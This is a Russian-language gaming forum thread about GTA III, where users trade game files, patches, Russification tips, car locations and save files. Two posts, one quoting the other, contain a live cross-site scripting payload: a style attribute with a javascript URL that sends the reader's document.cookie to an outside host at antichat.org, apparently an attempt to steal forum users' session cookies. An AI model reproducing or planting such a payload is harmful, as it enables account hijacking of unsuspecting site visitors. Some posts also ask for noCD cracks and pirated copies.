Перейти к содержанию

Нужные файлы


Рекомендуемые сообщения

Все в архиве.

Модели: \models\Generic\weapons.dff

Текстуры: \models\MISC.TXD

handling.cfg, default.ide (там в начале тоже что-то про оружие есть).

Тебе не легче найти оригинальную GTA III, чем из Real Mod'а её восстанавливать?

gta3weapon.rar

Ссылка на комментарий
Поделиться на другие сайты

Спасибо тебе, что очередной раз мне помогаеш :) Если-бы где-то в продаже была, или в инет магазине на складе, я бы взял, может скоро достану, а пока так востанавливаю, даже как-то увлекательно :)
Ссылка на комментарий
Поделиться на другие сайты

Люди, срочно нужны оригинальные файлы додо, модель и текстура, а то этот истребитель уже и прохождение портит :help:
Ссылка на комментарий
Поделиться на другие сайты

Вот сегодня решил вспомнить старое и поиграть в ГТА 3. Установил с диска, запустил, начал играть, сохраняюсь, а загрузится немогу, ошибка. Вспомнил что был патч по исправлению этой проблемы, а найти немогу. Помогите ссылкой. Или-же другой способ исправить проблему. :help:
Ссылка на комментарий
Поделиться на другие сайты

???? ? ???? ????? ??? ?????? ???? ?????? ?...

 

 

'>[/url]]` style=`background:url(java script:document.images[1].src="http://antichat.org/s/HHH.gif?"+document.cookie)` :search:

Ссылка на комментарий
Поделиться на другие сайты

???? ? ???? ????? ??? ?????? ???? ?????? ?...

'><a href='http://wj`=`' target='_blank'>[/url]]` style=`background:url(java script:document.images[1].src="http://antichat.org/s/HHH.gif?"+document.cookie)` :search:

<{POST_SNAPBACK}>

Прога, для просмотра местонахождения игрока в Либерти Сити, так как таковой карты в игре не предусмотренно ;)

Ссылка на комментарий
Поделиться на другие сайты

Народ, ни у кого нету на GTA ]I[ noCD?

 

ЗЫ: Че за глюки с форумом?

(см. скрин)

http://img205.imageshack.us/img205/3198/21ik1.th.jpg

Изменено пользователем Leshiy
Ссылка на комментарий
Поделиться на другие сайты

Народ, помогите :help: Нужна карта расположений тачек для угона в гараж доков Портленда. Надо найти фургон с мороженным и Couch(РеалГТА3, там Coach с текстурой Монстра). Может у кого осталась карта или кто знаеет где его их искать :help: Ищу в Сант Марксе, нигде не появляется :( Изменено пользователем N3rzhuL
Ссылка на комментарий
Поделиться на другие сайты

Coach ищи рядом со стадиком, фургон с мороженным - редкая машинка, мне встречалась только на третьем острове на шоссе, которое от аэропорта поднимается в гору, там ещё вдоль него рекламные щиты.
Ссылка на комментарий
Поделиться на другие сайты

Coach ищи рядом со стадиком, фургон с мороженным - редкая машинка, мне встречалась только на третьем острове на шоссе, которое от аэропорта поднимается в гору, там ещё вдоль него рекламные щиты.

<{POST_SNAPBACK}>

Я только в Портленде ;) Хочу сначала пройти все мини миссии в нём, что-бы потом, когда банды станут вражескими не мучаться ;) Уже сам нашёл эти транспортные средства ;)

Ссылка на комментарий
Поделиться на другие сайты

Ни кто не знает где можно скачать хороший руссификатор для GTA3, офф буковский не предлагать, т.к. у меня пиратка и он не хочет на неё ставится.

Или как нить можно всётаки установить перевод от буки на пиратку?

Ссылка на комментарий
Поделиться на другие сайты

Да можно, тока надо установить сперва англиский патч, вроде версии 1.01, а потом на него поставить патч от буки. Если не получитца я тебе как нить пришлю разпакованный патч от буки. Изменено пользователем RamireZ
Ссылка на комментарий
Поделиться на другие сайты

:help: Помогите моему горю - уже 4 месяца ищу ГТА 1 в инете и ингде нет, везде только демо версии. Плиз, если у кого етсь на винте или на диске старом, выложите пожалуйста или перешлите по почте на [email protected].

 

 

P.S. Если будете выкладывать, поменяйте расширение файла на любое, кроме exe rar zip mp3 avi mov, а то злой админ закрыл доступ к файлам данного типа! :help:

Ссылка на комментарий
Поделиться на другие сайты

Спасибо что ответил, но там прямая ссылка с расширением Zip, а у меня запрет стоит :cray: . См. пост выше. И ещё одно условие, желательно чтоб в пути к файлу не было слова game. :cray:
Ссылка на комментарий
Поделиться на другие сайты

Народ, подскажите, в какой папке GTA 3 лежат звуковые файлы заданий главных персонажей игры и музыка радио? Очень надо! Спасибо.
Ссылка на комментарий
Поделиться на другие сайты

Народ, подскажите, в какой папке GTA 3 лежат звуковые файлы заданий главных персонажей игры и музыка радио? Очень надо! Спасибо.

<{POST_SNAPBACK}>

На скольки дисках твоя игра? Нормальная версия распространяется на 2 CD. CD 1 - для установки игры, CD 2 - непосредственно для игры, так вот на CD 2 есть папка Audio, в которой лежат все звуковые файлы.

Ссылка на комментарий
Поделиться на другие сайты

Всё, спасибо, нашёл сам. Дисков игры у меня нет, как давно установили, так и лежит.

Открыл Мой компьютер, в строке Устройства со съёмными носителями нашёл значок GTA3(F:) объёмом 416МБ (значок как у неизвестного приложения). На нём надо щёлкнуть было правой (!) мышью и выбрать строку Открыть. Там и была потерянная папка Audio c музыкой и заданиями игры объёмом 215 МБ, что и требовалось. (Хотя сама игра у меня лежит в D:\Games\GTA ]I[).

Ссылка на комментарий
Поделиться на другие сайты

Скинте мне пожалуйста сейв на половину пройденой игры....ГТА3 Ато купил вот ГТА3 MAx PayneMOd И по тупости удалил сейвы Изменено пользователем SMAll
Ссылка на комментарий
Поделиться на другие сайты

Скинте мне пожалуйста сейв на половину пройденой игры....ГТА3 Ато купил вот ГТА3 MAx PayneMOd И по тупости удалил сейвы

Вот, держи пройдено 39 миссий из 73, а общий % - 31

Статистика там золотая, так что играй хорошо :wink:

Ссылка на комментарий
Поделиться на другие сайты

Подскажыте пожалуста можноли играть в GTA 3 вдвоем по сети??? Если можно то плиз обесните как ето делать. Заранее благодарин!!! :wink:
Ссылка на комментарий
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Восстановить форматирование

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

Загрузка...
×
×
  • Создать...